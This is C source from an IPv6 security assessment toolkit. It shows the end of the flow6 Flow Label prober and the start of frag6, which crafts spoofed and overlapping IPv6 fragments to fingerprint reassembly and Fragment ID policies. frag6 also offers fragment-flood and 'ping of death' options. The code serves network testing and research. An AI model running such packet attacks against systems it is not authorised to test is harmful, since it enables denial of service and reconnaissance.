tcp->th_urp= htons(0); tcp->th_win= htons(tcpwin); tcp->th_off= sizeof(struct tcp_hdr) >> 2; ipv6->ip6_plen= htons(ptr - (unsigned char *) tcp); tcp->th_sum = in_chksum(ipv6, tcp, (ptr - (unsigned char *) tcp), IPPROTO_TCP); } else{ udp= (struct udp_hdr *) ( (unsigned char *) ipv6 + sizeof(struct ip6_hdr)); ptr= (unsigned char *) udp + sizeof(struct udp_hdr); bzero(udp, sizeof(struct udp_hdr)); udp->uh_sport= htons(lastport); udp->uh_dport= htons(dstport); ipv6->ip6_plen= htons(ptr - (unsigned char *) udp); udp->uh_sum = in_chksum(ipv6, udp, (ptr - (unsigned char *) udp), IPPROTO_TCP); } if((nw=pcap_inject(idata.pfd, buffer, ptr - buffer)) == -1){ if(idata.verbose_f) printf("pcap_inject(): %s\n", pcap_geterr(idata.pfd)); return(-1); } if(nw != (ptr- buffer)){ if(idata.verbose_f) printf("pcap_inject(): only wrote %lu bytes (rather than %lu bytes)\n", (LUI) nw, (LUI) (ptr-buffer)); return(-1); } return(0); } /* * Function: usage() * * Prints the syntax of the flow6 tool */ void usage(void){ puts("usage: flow6 -i INTERFACE -d DST_ADDR [-S LINK_SRC_ADDR] [-D LINK-DST-ADDR]\n" " [-s SRC_ADDR[/LEN]] [-A HOP_LIMIT] [-P PROTOCOL] [-p PORT]\n" " [-W] [-v] [-h]"); } /* * Function: print_help() * * Prints help information for the flow6 tool */ void print_help(void){ puts(SI6_TOOLKIT); puts("flow6: Security assessment tool for the IPv6 Flow Label field\n"); usage(); puts("\nOPTIONS:\n" " --interface, -i Network interface\n" " --link-src-address, -S Link-layer Destination Address\n" " --link-dst-address, -D Link-layer Source Address\n" " --src-address, -s IPv6 Source Address\n" " --dst-address, -d IPv6 Destination Address\n" " --hop-limit, -A IPv6 Hop Limit\n" " --protocol, -P IPv6 Payload protocol (valid: TCP, UDP)\n" " --dst-port, -p Transport Protocol Destination Port\n" " --flow-label-policy, -W Assess the Flow Label generation policy\n" " --help, -h Print help for the flow6 tool\n" " --verbose, -v Be verbose\n" "\n" "Programmed by Fernando Gont on behalf of SI6 Networks \n" "Please send any bug reports to \n" ); } /* * Function: print_attack_info() * * Prints attack details (when the verbose ("-v") option is specified). */ void print_attack_info(void){ if(ether_ntop(&(idata.hsrcaddr), plinkaddr, sizeof(plinkaddr)) == 0){ puts("ether_ntop(): Error converting address"); exit(EXIT_FAILURE); } printf("Ethernet Source Address: %s%s\n", plinkaddr, (!idata.hsrcaddr_f)?" (automatically selected)":""); /* Ethernet Destination Address only used if a IPv6 Destination Address or an Ethernet Destination Address were specified. */ if(ether_ntop(&(idata.hdstaddr), plinkaddr, sizeof(plinkaddr)) == 0){ puts("ether_ntop(): Error converting address"); exit(EXIT_FAILURE); } printf("Ethernet Destination Address: %s%s\n", plinkaddr, (!idata.hdstaddr_f)?" (automatically selected)":""); if(inet_ntop(AF_INET6, &(idata.srcaddr), psrcaddr, sizeof(psrcaddr)) == NULL){ puts("inet_ntop(): Error converting IPv6 Source Address to presentation format"); exit(EXIT_FAILURE); } if(idata.dstaddr_f){ printf("IPv6 Source Address: %s%s\n", psrcaddr, ((!idata.srcaddr_f)?" (automatically selected)":"")); } if(inet_ntop(AF_INET6, &(idata.dstaddr), pdstaddr, sizeof(pdstaddr)) == NULL){ puts("inet_ntop(): Error converting IPv6 Destination Address to presentation format"); exit(EXIT_FAILURE); } printf("IPv6 Destination Address: %s\n", pdstaddr); printf("IPv6 Hop Limit: %u%s\n", hoplimit, (hoplimit_f)?"":" (randomized)"); printf("Protocol: %s\tDestination Port: %u\n", (protocol==IPPROTO_TCP)?"TCP":"UDP", dstport); } /* * Function: predict_flow_id() * * Identifies and prints the Flow Label generation policy */ int predict_flow_id(u_int32_t *s1, unsigned int n1, u_int32_t *s2, unsigned int n2){ u_int32_t diff1_avg, diff2_avg; double diff1_sdev, diff2_sdev; if(inc_sdev(s1, n1, &diff1_avg, &diff1_sdev) == -1){ if(idata.verbose_f) puts("Error while allocating memory in inc_sdev()"); return(-1); } if(inc_sdev(s2, n2, &diff2_avg, &diff2_sdev) == -1){ if(idata.verbose_f) puts("Error while allocating memory in inc_sdev()"); return(-1); } if(diff1_sdev == 0 && diff1_avg == 0){ if(diff2_sdev == 0 && diff2_avg == 0){ printf("Flow Label policy: Global (predictable) constant labels, set to %05lu\n", (LUI) s1[0]); } else{ printf("Flow Label policy: Per-destination constant labels with increments of %lu (sdev: %f)\n", \ (LUI) diff2_avg, diff2_sdev); } } else if(diff1_sdev <= 100){ if(diff2_sdev <= 100){ printf("Flow Label policy: Global (predictable) labels with increments of %lu (sdev: %f)\n", \ (LUI) diff1_avg, diff1_sdev); } else{ printf("Flow Label policy: Per-destination labels with increments of %lu (sdev: %f)\n", \ (LUI) diff1_avg, diff1_sdev); printf(" Global policy: Avg. inc.: %lu, sdev: %f\n", (LUI) diff2_avg, diff2_sdev); } } else{ puts("Flow Label policy: Randomized labels"); printf(" Per-destination: Avg. inc.: %lu, sdev: %f\n" " Global: Avg. inc.: %lu, sdev: %f\n", \ (LUI) diff1_avg, diff1_sdev, (LUI) diff2_avg, diff2_sdev); } return(0); } ipv6toolkit-1.5.1/tools/flow6.h000066400000000000000000000001131223702747200163570ustar00rootroot00000000000000/* * Header file for the flow6 tool * */ #define QUERY_TIMEOUT 65 ipv6toolkit-1.5.1/tools/frag6.c000066400000000000000000002261531223702747200163400ustar00rootroot00000000000000/* * frag6: A security assessment tool that exploits potential flaws in the * processing of IPv6 fragments * * Copyright (C) 2011-2013 Fernando Gont (fgont@si6networks.com) * * This program is free software: you can redistribute it and/or modify * it under the terms of the GNU General Public License as published by * the Free Software Foundation, either version 3 of the License, or * (at your option) any later version. * * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU General Public License for more details. * * You should have received a copy of the GNU General Public License * along with this program. If not, see . * * * Build with: make frag6 * * This program has been tested to compile and run on: Debian GNU/Linux 6.0, * FreeBSD 9.0, NetBSD 5.1, OpenBSD 5.0, and Ubuntu 11.10. * * It requires that the libpcap library be installed on your system. * * Please send any bug reports to Fernando Gont */ #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #ifdef __linux__ #include #elif defined (__FreeBSD__) || defined(__NetBSD__) || defined (__OpenBSD__) || defined(__APPLE__) #include #endif #include "frag6.h" #include "ipv6toolkit.h" #include "libipv6.h" #include /* Function prototypes */ int predict_frag_id(u_int32_t *, unsigned int, u_int32_t *, unsigned int); void print_attack_info(struct iface_data *); void print_help(void); void print_icmp6_echo(struct iface_data *, struct pcap_pkthdr *, const u_char *); void print_icmp6_timed(struct iface_data *, struct pcap_pkthdr *, const u_char *); void process_icmp6_echo(struct iface_data *, struct pcap_pkthdr *, const u_char *, unsigned char *, unsigned int *); void process_icmp6_timed(struct iface_data *, struct pcap_pkthdr *, const u_char *, unsigned char *); int send_fid_probe(struct iface_data *); int send_fragment(struct iface_data *, unsigned int, unsigned int, unsigned int, unsigned int, unsigned int); int send_fragment2(struct iface_data *, u_int16_t, unsigned int, unsigned int, unsigned int, unsigned int, char *); int test_frag_pattern(unsigned char *, unsigned int, char *); void usage(void); int valid_icmp6_response(struct iface_data *, struct pcap_pkthdr *, const u_char *); int valid_icmp6_response2(struct iface_data *, struct pcap_pkthdr *, const u_char *, unsigned int); /* Used for router discovery */ struct iface_data idata; struct prefix_entry *prefix_ols[MAX_PREFIXES_ONLINK], *prefix_acs[MAX_PREFIXES_AUTO]; struct prefix_entry *prefix_local[MAX_LOCAL_ADDRESSES]; struct in6_addr randprefix; unsigned char randpreflen; /* Data structures for packets read from the wire */ struct pcap_pkthdr *pkthdr; const u_char *pktdata; unsigned char *pkt_end, *pkt_ptr; struct ether_header *pkt_ether; struct ip6_hdr *pkt_ipv6; struct ip6_frag *pkt_fh; struct icmp6_hdr *pkt_icmp6; struct nd_neighbor_solicit *pkt_ns; struct in6_addr *pkt_ipv6addr; unsigned int pktbytes; bpf_u_int32 my_netmask; bpf_u_int32 my_ip; struct bpf_program pcap_filter; char dev[64], errbuf[PCAP_ERRBUF_SIZE]; unsigned char buffer[65556], buffrh[MIN_IPV6_HLEN + MIN_TCP_HLEN]; unsigned char *v6buffer, *ptr, *startofprefixes; char *pref; struct ip6_hdr *ipv6; struct icmp6_hdr *icmp6; struct ether_header *ethernet; struct dlt_null *dlt_null; struct nd_opt_tlla *tllaopt; struct ether_addr linkaddr[MAX_TLLA_OPTION]; unsigned int nlinkaddr=0, linkaddrs; char *lasts, *rpref; char *charptr; size_t nw; unsigned long ul_res, ul_val; unsigned int i, j, startrand; unsigned int skip; unsigned int frags, nfrags, nsleep; u_int16_t mask, ip6length; u_int8_t hoplimit; char plinkaddr[ETHER_ADDR_PLEN]; char psrcaddr[INET6_ADDRSTRLEN], pdstaddr[INET6_ADDRSTRLEN], pv6addr[INET6_ADDRSTRLEN]; unsigned char verbose_f=0; unsigned char floodf_f=0; unsigned char loop_f=0, sleep_f=0, localaddr_f=0, tstamp_f=1, pod_f=0; unsigned char srcprefix_f=0, hoplimit_f=0, ip6length_f=0, icmp6psize_f=0; unsigned char fsize_f=0, forder_f=0, foffset_f=0, fid_f=0, fragp_f=0, fragidp_f=0, resp_f=1; u_int32_t fsize, foffset, fid, id; unsigned int forder, overlap, minfragsize; /* Support for Extension Headers */ unsigned int dstopthdrs, dstoptuhdrs, hbhopthdrs; char hbhopthdr_f=0, dstoptuhdr_f=0, dstopthdr_f=0; unsigned char *dstopthdr[MAX_DST_OPT_HDR], *dstoptuhdr[MAX_DST_OPT_U_HDR]; unsigned char *hbhopthdr[MAX_HBH_OPT_HDR]; unsigned int dstopthdrlen[MAX_DST_OPT_HDR], dstoptuhdrlen[MAX_DST_OPT_U_HDR]; unsigned int hbhopthdrlen[MAX_HBH_OPT_HDR], m, pad; struct ip6_frag *fh; struct ip6_hdr *fipv6; unsigned char *fragpart, *ptrend, *ptrhdr, *ptrhdrend; unsigned int hdrlen, ndstopthdr=0, nhbhopthdr=0, ndstoptuhdr=0; unsigned int nfrags, fragsize, max_packet_size; unsigned char *prev_nh, *startoffragment; /* Basic data blocks used for detecting the fragment reassembly policy. They contain the same words * in different order, thus resulting in the same checksum */ #define FRAG_BLOCK_SIZE 8 char block1[8]={'a', 'a', 'b', 'b', 'c', 'c', 'd', 'd'}; char block2[8]={'b', 'b', 'a', 'a', 'c', 'c', 'd', 'd'}; char block3[8]={'c', 'c', 'a', 'a', 'b', 'b', 'd', 'd'}; char block4[8]={'d', 'd', 'a', 'a', 'b', 'b', 'c', 'c'}; char block5[8]={'d', 'd', 'c', 'c', 'b', 'b', 'a', 'a'}; char block6[8]={'c', 'c', 'd', 'd', 'b', 'b', 'a', 'a'}; char block7[8]={'b', 'b', 'd', 'd', 'c', 'c', 'a', 'a'}; char block8[8]={'a', 'a', 'd', 'd', 'c', 'c', 'b', 'b'}; /* For the sampling of Fragment Identification values */ u_int16_t addr_sig, addr_key; u_int32_t icmp6_sig; int main(int argc, char **argv){ extern char *optarg; char *endptr; /* Used by strtoul() */ fd_set sset, rset; struct timeval timeout; int r, sel; time_t curtime, start, lastfrag=0, lastfrag1=0, lastfrag2=0; time_t lastfrag3=0, lastfrag4=0, lastfrag5=0; unsigned int responses=0, maxsizedchunk; /* Array for storing the Fragment reassembly policy test results */ unsigned char test[5]; /* Arrays for storing the Fragment ID samples */ u_int32_t test1[NSAMPLES], test2[NSAMPLES]; unsigned int ntest1=0, ntest2=0; unsigned char testtype; static struct option longopts[] = { {"interface", required_argument, 0, 'i'}, {"link-src-addr", required_argument, 0, 'S'}, {"link-dst-addr", required_argument, 0, 'D'}, {"src-address", required_argument, 0, 's'}, {"dst-address", required_argument, 0, 'd'}, {"hop-limit", required_argument, 0, 'A'}, {"dst-opt-hdr", required_argument, 0, 'u'}, {"dst-opt-u-hdr", required_argument, 0, 'U'}, {"hbh-opt-hdr", required_argument, 0, 'H'}, {"frag-size", required_argument, 0, 'P'}, {"frag-type", required_argument, 0, 'O'}, {"frag-offset", required_argument, 0, 'o'}, {"frag-id", required_argument, 0, 'I'}, {"no-timestamp", no_argument, 0, 'T'}, {"no-responses", no_argument, 0, 'n'}, {"frag-reass-policy", no_argument, 0, 'p'}, {"frag-id-policy", no_argument, 0, 'W'}, {"pod-attack", no_argument, 0, 'X'}, {"flood-frags", required_argument, 0, 'F'}, {"loop", no_argument, 0, 'l'}, {"sleep", required_argument, 0, 'z'}, {"verbose", no_argument, 0, 'v'}, {"help", no_argument, 0, 'h'} }; char shortopts[]= "i:S:D:s:d:A:u:U:H:P:O:o:I:TnpWXF:lz:vh"; char option; if(argc<=1){ usage(); exit(EXIT_FAILURE); } srandom(time(NULL)); hoplimit=64+random()%180; init_iface_data(&idata); while((r=getopt_long(argc, argv, shortopts, longopts, NULL)) != -1) { option= r; switch(option) { case 'i': /* Interface */ strncpy(idata.iface, optarg, IFACE_LENGTH-1); idata.iface[IFACE_LENGTH-1]=0; idata.ifindex= if_nametoindex(idata.iface); idata.iface_f=TRUE; break; case 's': /* IPv6 Source Address */ if((charptr = strtok_r(optarg, "/", &lasts)) == NULL){ puts("Error in Source Address"); exit(EXIT_FAILURE); } if ( inet_pton(AF_INET6, charptr, &(idata.srcaddr)) <= 0){ puts("inet_pton(): Source Address not valid"); exit(EXIT_FAILURE); } idata.srcaddr_f = 1; if((charptr = strtok_r(NULL, " ", &lasts)) != NULL){ idata.srcpreflen = atoi(charptr); if(idata.srcpreflen>128){ puts("Prefix length error in IPv6 Source Address"); exit(EXIT_FAILURE); } sanitize_ipv6_prefix(&(idata.srcaddr), idata.srcpreflen); idata.srcprefix_f=1; } break; case 'd': /* IPv6 Destination Address */ if( inet_pton(AF_INET6, optarg, &(idata.dstaddr)) <= 0){ puts("inet_pton(): address not valid"); exit(EXIT_FAILURE); } idata.dstaddr_f = 1; break; case 'A': /* Hop Limit */ hoplimit= atoi(optarg); hoplimit_f=1; break; case 'u': /* Destinations Options Header */ if(ndstopthdr >= MAX_DST_OPT_HDR){ puts("Too many Destination Options Headers"); exit(EXIT_FAILURE); } hdrlen= atoi(optarg); if(hdrlen < 8){ puts("Bad length in Destination Options Header"); exit(EXIT_FAILURE); } hdrlen = ((hdrlen+7)/8) * 8; dstopthdrlen[ndstopthdr]= hdrlen; if( (dstopthdr[ndstopthdr]= malloc(hdrlen)) == NULL){ puts("Not enough memory for Destination Options Header"); exit(EXIT_FAILURE); } ptrhdr= dstopthdr[ndstopthdr] + 2; ptrhdrend= dstopthdr[ndstopthdr] + hdrlen; while( ptrhdr < ptrhdrend){ if( (ptrhdrend-ptrhdr)>257) pad= 257; else pad= ptrhdrend-ptrhdr; if(!insert_pad_opt(ptrhdr, ptrhdrend, pad)){ puts("Destination Options Header Too Big"); exit(EXIT_FAILURE); } ptrhdr= ptrhdr + pad; } *(dstopthdr[ndstopthdr]+1)= (hdrlen/8)-1; ndstopthdr++; dstopthdr_f=1; break; case 'U': /* Destination Options Header (Unfragmentable Part) */ if(ndstoptuhdr >= MAX_DST_OPT_U_HDR){ puts("Too many Destination Options Headers (Unfragmentable Part)"); exit(EXIT_FAILURE); } hdrlen= atoi(optarg); if(hdrlen < 8){ puts("Bad length in Destination Options Header (Unfragmentable Part)"); exit(EXIT_FAILURE); } hdrlen = ((hdrlen+7)/8) * 8; dstoptuhdrlen[ndstoptuhdr]= hdrlen; if( (dstoptuhdr[ndstoptuhdr]= malloc(hdrlen)) == NULL){ puts("Not enough memory for Destination Options Header (Unfragmentable Part)"); exit(EXIT_FAILURE); } ptrhdr= dstoptuhdr[ndstoptuhdr]+2; ptrhdrend= dstoptuhdr[ndstoptuhdr] + hdrlen; while( ptrhdr < ptrhdrend){ if( (ptrhdrend-ptrhdr)>257) pad= 257; else pad= ptrhdrend-ptrhdr; if(!insert_pad_opt(ptrhdr, ptrhdrend, pad)){ puts("Destination Options Header (Unfragmentable Part) Too Big"); exit(EXIT_FAILURE); } ptrhdr = ptrhdr + pad; } *(dstoptuhdr[ndstoptuhdr]+1)= (hdrlen/8) - 1; ndstoptuhdr++; dstoptuhdr_f=1; break; case 'H': /* Hop-by-Hop Options Header */ if(nhbhopthdr >= MAX_HBH_OPT_HDR){ puts("Too many Hop-by-Hop Options Headers"); exit(EXIT_FAILURE); } hdrlen= atoi(optarg); if(hdrlen <= 8){ puts("Bad length in Hop-by-Hop Options Header"); exit(EXIT_FAILURE); } hdrlen = ((hdrlen+7)/8) * 8; hbhopthdrlen[nhbhopthdr]= hdrlen; if( (hbhopthdr[nhbhopthdr]= malloc(hdrlen)) == NULL){ puts("Not enough memory for Hop-by-Hop Options Header"); exit(EXIT_FAILURE); } ptrhdr= hbhopthdr[nhbhopthdr] + 2; ptrhdrend= hbhopthdr[nhbhopthdr] + hdrlen; while( ptrhdr < ptrhdrend){ if( (ptrhdrend-ptrhdr)>257) pad= 257; else pad= ptrhdrend-ptrhdr; if(!insert_pad_opt(ptrhdr, ptrhdrend, pad)){ puts("Hop-by-Hop Options Header Too Big"); exit(EXIT_FAILURE); } ptrhdr = ptrhdr + pad; } *(hbhopthdr[nhbhopthdr]+1)= (hdrlen/8) - 1; nhbhopthdr++; hbhopthdr_f=1; break; case 'S': /* Source Ethernet address */ if(ether_pton(optarg, &(idata.hsrcaddr), sizeof(idata.hsrcaddr)) == 0){ puts("Error in Source link-layer address."); exit(EXIT_FAILURE); } idata.hsrcaddr_f = 1; break; case 'D': /* Destination Ethernet Address */ if(ether_pton(optarg, &(idata.hdstaddr), sizeof(idata.hdstaddr)) == 0){ puts("Error in Source link-layer address."); exit(EXIT_FAILURE); } idata.hdstaddr_f = 1; break; case 'P': /* Fragment Size*/ fsize= atoi(optarg); fsize_f= 1; break; case 'O': /* Fragment Type */ if(strncmp(optarg, "first", MAX_STRING_SIZE) == 0){ forder= FIRST_FRAGMENT; forder_f=1; } else if(strncmp(optarg, "last", MAX_STRING_SIZE) == 0){ forder= LAST_FRAGMENT; forder_f=1; } else if(strncmp(optarg, "middle", MAX_STRING_SIZE) == 0){ forder= MIDDLE_FRAGMENT; forder_f=1; } else if(strncmp(optarg, "atomic", MAX_STRING_SIZE) == 0){ forder= ATOMIC_FRAGMENT; forder_f=1; } else{ puts("Unknown fragment order (valid order types: 'first', 'last', 'middle')"); exit(EXIT_FAILURE); } break; case 'o': /* Fragment Offset */ if((ul_res = strtoul(optarg, &endptr, 0)) == ULONG_MAX){ perror("Error in 'Fragment Offset' parameter"); exit(EXIT_FAILURE); } if(endptr != optarg){ foffset = ul_res; foffset_f=1; } break; case 'I': /* Fragment Identification */ if((ul_res = strtoul(optarg, &endptr, 0)) == ULONG_MAX){ perror("Error in 'Fragment Identification' parameter"); exit(EXIT_FAILURE); } if(endptr != optarg){ fid = ul_res; fid_f=1; } break; case 'T': /* Do not include timestamp in fragment */ tstamp_f=0; break; case 'n': /* Do not show responses */ resp_f=0; break; case 'p': /* Assess the fragment reassembly policy of the target */ fragp_f= 1; break; case 'W': /* Assess the fragment id generation policy of the target */ fragidp_f= 1; break; case 'F': /* Flood target with fragments */ nfrags= atoi(optarg); if(nfrags == 0){ puts("Invalid number of fragments in option -F"); exit(EXIT_FAILURE); } floodf_f= 1; break; case 'X': pod_f=1; break; case 'l': /* "Loop mode */ loop_f = 1; break; case 'z': /* Sleep option */ nsleep=atoi(optarg); if(nsleep==0){ puts("Invalid number of seconds in '-z' option"); exit(EXIT_FAILURE); } sleep_f=1; break; case 'v': /* Be verbose */ idata.verbose_f++; break; case 'h': /* Help */ print_help(); exit(EXIT_FAILURE); break; default: usage(); exit(EXIT_FAILURE); break; } /* switch */ } /* while(getopt) */ verbose_f= idata.verbose_f; if(geteuid()) { puts("frag6 needs root privileges to run."); exit(EXIT_FAILURE); } if(!idata.iface_f){ if(idata.dstaddr_f && IN6_IS_ADDR_LINKLOCAL(&(idata.dstaddr))){ puts("Must specify a network interface for link-local destinations"); exit(EXIT_FAILURE); } } if(load_dst_and_pcap(&idata, LOAD_SRC_NXT_HOP) == FAILURE){ puts("Error while learning Souce Address and Next Hop"); exit(EXIT_FAILURE); } release_privileges(); if((idata.ip6_local_flag && idata.ip6_global_flag) && !idata.srcaddr_f) localaddr_f=1; if(!sleep_f) nsleep=QUERY_TIMEOUT; max_packet_size = MAX_IPV6_PAYLOAD + MIN_IPV6_HLEN; if(idata.verbose_f){ print_attack_info(&idata); } if(!idata.dstaddr_f){ puts("Error: Nothing to send! (Destination Address left unspecified)"); exit(EXIT_FAILURE); } if(!floodf_f) nfrags=1; if(!forder_f) forder= MIDDLE_FRAGMENT; /* Assess the Fragment Reassembly policy */ if(fragp_f){ puts("Identifying fragment reassembly policy of the target node...."); /* Set filter for receiving Neighbor Solicitations, ICMPv6 Echo Responses, and ICMPv6 Time Exceeded */ if(pcap_compile(idata.pfd, &pcap_filter, PCAP_ICMPV6_NSECHOEXCEEDED_FILTER, PCAP_OPT, PCAP_NETMASK_UNKNOWN) == -1){ printf("pcap_compile(): %s\n", pcap_geterr(idata.pfd)); exit(EXIT_FAILURE); } if(pcap_setfilter(idata.pfd, &pcap_filter) == -1){ printf("pcap_setfilter(): %s\n", pcap_geterr(idata.pfd)); exit(EXIT_FAILURE); } pcap_freecode(&pcap_filter); /* Initialize the table of results for the different tests */ for(i=0; i<5; i++) test[i]= TIMED_OUT; /* These two variables select the fragment "overlap" size for the tests, and the minimum fragment size. They are currently hardcoded, but will be configurable in future revisions of the tool. */ overlap=8; minfragsize= 8*10; /* Since the current version of the tool does not reassemble response packets, we need to prevent response packets from employing fragmentation. The maximum-sized packets that we send is composed of a 4*minfragsize payload plus IPv6 and ICMPv6 headers -- hence the check bellow. */ if(minfragsize > ((idata.mtu - sizeof(struct ip6_hdr) - sizeof(struct icmp6_hdr))/4)){ puts("Error: minimum fragment size is too large"); exit(EXIT_FAILURE); } if(overlap < 8 || (overlap%8) != 0 || overlap >= minfragsize){ puts("Error: Incorrect 'overlap' value"); exit(EXIT_FAILURE); } if( (idata.fd= pcap_fileno(idata.pfd)) == -1){ puts("Error obtaining descriptor number for pcap_t"); exit(EXIT_FAILURE); } FD_ZERO(&sset); FD_SET(idata.fd, &sset); start= time(NULL); lastfrag1= start - QUERY_TIMEOUT/2; lastfrag2= start - QUERY_TIMEOUT/2 + 1; lastfrag3= start - QUERY_TIMEOUT/2 + 2; lastfrag4= start - QUERY_TIMEOUT/2 + 3; lastfrag5= start - QUERY_TIMEOUT/2 + 4; responses=0; while(1){ curtime=time(NULL); if((curtime - start) >= QUERY_TIMEOUT || responses >= 5){ break; } if((curtime - lastfrag1) >= QUERY_TIMEOUT/2 && (test[0]== TIMED_OUT || test[0]==TIME_EXCEEDED)){ if(idata.verbose_f) puts("Sending Fragments for Test #1...."); id= random(); if(send_fragment2(&idata, sizeof(struct icmp6_hdr)+minfragsize*2-overlap, id, 0, minfragsize, \ FIRST_FRAGMENT, block1) == -1){ } if(send_fragment2(&idata, 0, id, sizeof(struct icmp6_hdr)+minfragsize-overlap, minfragsize, \ LAST_FRAGMENT, block6) == -1){ } lastfrag1=curtime; continue; } if((curtime - lastfrag2) >= QUERY_TIMEOUT/2 && (test[1]== TIMED_OUT || test[1]==TIME_EXCEEDED)){ if(idata.verbose_f) puts("Sending Fragments for Test #2...."); id= random(); if(send_fragment2(&idata, sizeof(struct icmp6_hdr)+minfragsize * 3-overlap, id, 0, minfragsize, \ FIRST_FRAGMENT, block2) == -1){ } if(send_fragment2(&idata, 0, id, sizeof(struct icmp6_hdr)+minfragsize * 2-overlap, minfragsize, \ LAST_FRAGMENT, block6) == -1){ } if(send_fragment2(&idata, 0, id, sizeof(struct icmp6_hdr)+minfragsize-overlap, minfragsize, \ MIDDLE_FRAGMENT, block7) == -1){ } lastfrag2=curtime; continue; } if((curtime - lastfrag3) >= QUERY_TIMEOUT/2 && (test[2]== TIMED_OUT || test[2]==TIME_EXCEEDED)){ if(idata.verbose_f) puts("Sending Fragments for Test #3...."); id= random(); if(send_fragment2(&idata, sizeof(struct icmp6_hdr)+minfragsize * 3-overlap, id, 0, minfragsize, \ FIRST_FRAGMENT, block3) == -1){ } if(send_fragment2(&idata, 0, id, sizeof(struct icmp6_hdr)+minfragsize * 2-overlap, minfragsize, \ LAST_FRAGMENT, block6) == -1){ } if(send_fragment2(&idata, 0, id, sizeof(struct icmp6_hdr)+minfragsize, minfragsize, MIDDLE_FRAGMENT, \ block7) == -1){ } lastfrag3=curtime; continue; } if((curtime - lastfrag4) >= QUERY_TIMEOUT/2 && (test[3]== TIMED_OUT || test[3]==TIME_EXCEEDED)){ if(idata.verbose_f) puts("Sending Fragments for Test #4...."); id= random(); if(send_fragment2(&idata, sizeof(struct icmp6_hdr)+minfragsize *4, id, 0, minfragsize, FIRST_FRAGMENT, \ block4) == -1){ } if(send_fragment2(&idata, 0, id, sizeof(struct icmp6_hdr)+minfragsize * 2, minfragsize, MIDDLE_FRAGMENT, \ block6) == -1){ } if(send_fragment2(&idata, 0, id, sizeof(struct icmp6_hdr)+minfragsize, minfragsize *3, LAST_FRAGMENT, \ block7) == -1){ } lastfrag4=curtime; continue; } if((curtime - lastfrag5) >= QUERY_TIMEOUT/2 && (test[4]== TIMED_OUT || test[4]==TIME_EXCEEDED)){ if(idata.verbose_f) puts("Sending Fragments for Test #5...."); id= random(); if(send_fragment2(&idata, sizeof(struct icmp6_hdr)+minfragsize * 4 - overlap, id, 0, minfragsize, \ FIRST_FRAGMENT, block5) == -1){ puts("Error when writing fragment"); exit(EXIT_FAILURE); } if(send_fragment2(&idata, 0, id, sizeof(struct icmp6_hdr)+minfragsize * 2, minfragsize, MIDDLE_FRAGMENT, \ block6) == -1){ puts("Error when writing fragment"); exit(EXIT_FAILURE); } if(send_fragment2(&idata, 0, id, sizeof(struct icmp6_hdr)+minfragsize * 3 - overlap, minfragsize, \ LAST_FRAGMENT, block7) == -1){ puts("Error when writing fragment"); exit(EXIT_FAILURE); } if(send_fragment2(&idata, 0, id, sizeof(struct icmp6_hdr)+minfragsize, minfragsize, MIDDLE_FRAGMENT, \ block8) == -1){ puts("Error when writing fragment"); exit(EXIT_FAILURE); } lastfrag5=curtime; } rset= sset; timeout.tv_usec=0; timeout.tv_sec= 1; if((sel=select(idata.fd+1, &rset, NULL, NULL, &timeout)) == -1){ if(errno == EINTR){ continue; } else{ puts("Error in select()"); exit(EXIT_FAILURE); } } if(sel == 0) continue; /* Read a packet (Echo Reply, ICMPv6 Error, or Neighbor Solicitation) */ if((r=pcap_next_ex(idata.pfd, &pkthdr, &pktdata)) == -1){ printf("pcap_next_ex(): %s", pcap_geterr(idata.pfd)); exit(EXIT_FAILURE); } else if(r == 0){ continue; /* Should never happen */ } pkt_ether = (struct ether_header *) pktdata; pkt_ipv6 = (struct ip6_hdr *)((char *) pkt_ether + idata.linkhsize); pkt_icmp6 = (struct icmp6_hdr *) ((char *) pkt_ipv6 + sizeof(struct ip6_hdr)); pkt_ns= (struct nd_neighbor_solicit *) pkt_icmp6; pkt_end = (unsigned char *) pktdata + pkthdr->caplen; if( (pkt_end - pktdata) < (idata.linkhsize + MIN_IPV6_HLEN)) continue; if(pkt_ipv6->ip6_nxt == IPPROTO_ICMPV6){ if(idata.type == DLT_EN10MB && idata.flags != IFACE_LOOPBACK && pkt_icmp6->icmp6_type == ND_NEIGHBOR_SOLICIT){ if( (pkt_end - (unsigned char *) pkt_ns) < sizeof(struct nd_neighbor_solicit)) continue; /* If the addresses that we're using are not actually configured on the local system (i.e., they are "spoofed", we must check whether it is a Neighbor Solicitation for one of our addresses, and respond with a Neighbor Advertisement. Otherwise, the kernel will take care of that. */ if(idata.type == DLT_EN10MB && idata.flags != IFACE_LOOPBACK && !localaddr_f && \ is_eq_in6_addr(&(pkt_ns->nd_ns_target), &idata.srcaddr)){ if(send_neighbor_advert(&idata, idata.pfd, pktdata) == -1){ puts("Error sending Neighbor Advertisement"); exit(EXIT_FAILURE); } } } else if( (pkt_icmp6->icmp6_type == ICMP6_ECHO_REPLY) || (pkt_icmp6->icmp6_type == ICMP6_TIME_EXCEEDED)){ if( (pkt_end - (unsigned char *) pkt_icmp6) < sizeof(struct icmp6_hdr)) continue; switch(pkt_icmp6->icmp6_type){ case ICMP6_ECHO_REPLY: process_icmp6_echo(&idata, pkthdr, pktdata, test, &responses); break; case ICMP6_TIME_EXCEEDED: process_icmp6_timed(&idata, pkthdr, pktdata, test); break; } } } } for(i=0;i<5;i++){ printf("Test #%u: ", (i+1)); switch(test[i]){ case FIRST_COPY: puts("Target preferred first copy of overlapping data"); break; case LAST_COPY: puts("Target preferred last copy of overlapping data"); break; case TIME_EXCEEDED: puts("Received ICMPv6 Time Exceeded error message (fragments discarded)"); break; case TIMED_OUT: puts("Timed out (fragments discarded without notification)"); break; case UNKNOWN_COPY: puts("Unknown pattern in response (shouldn't happen!)"); break; } } exit(EXIT_SUCCESS); } /* Assess the Fragment ID generation policy */ if(fragidp_f){ puts("Identifying the 'Fragment ID' generation policy of the target node...."); /* Set filter for receiving Neighbor Solicitations, and fragmented ICMPv6 Echo Responses */ if(pcap_compile(idata.pfd, &pcap_filter, PCAP_ICMPV6NSFRAG_FILTER, PCAP_OPT, PCAP_NETMASK_UNKNOWN) == -1){ printf("pcap_compile(): %s\n", pcap_geterr(idata.pfd)); exit(EXIT_FAILURE); } if(pcap_setfilter(idata.pfd, &pcap_filter) == -1){ printf("pcap_setfilter(): %s\n", pcap_geterr(idata.pfd)); exit(EXIT_FAILURE); } pcap_freecode(&pcap_filter); FD_ZERO(&sset); FD_SET(idata.fd, &sset); start= time(NULL); lastfrag1=0; 